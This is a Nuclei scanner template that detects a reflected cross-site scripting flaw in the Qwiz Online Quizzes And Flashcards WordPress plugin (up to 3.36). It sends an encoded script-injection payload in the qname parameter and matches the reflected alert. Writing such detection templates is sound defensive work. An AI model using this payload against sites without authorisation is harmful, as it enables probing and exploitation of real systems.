32 lines
1.4 KiB
YAML
32 lines
1.4 KiB
YAML
id: wp-qwiz-online-xss
|
|
|
|
info:
|
|
name: Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues.
|
|
remediation: Fixed in version 3.37
|
|
reference:
|
|
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
|
|
- https://packetstormsecurity.com/files/154403/
|
|
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/"
|
|
tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards,xss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(body, "quizzes/flashcard") && contains(body, "</script><script>alert(document.domain)</script>")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100ff6532c28c9d55c99ce1d16ffe5bd1ccc69be841bb9bff96e34628badc05181f022100e31126ad944fb55cbb6c015690aedae7ab4a204aa181b1b921ab2fe73430be71:922c64590222798bb761d5b6d8e72950 |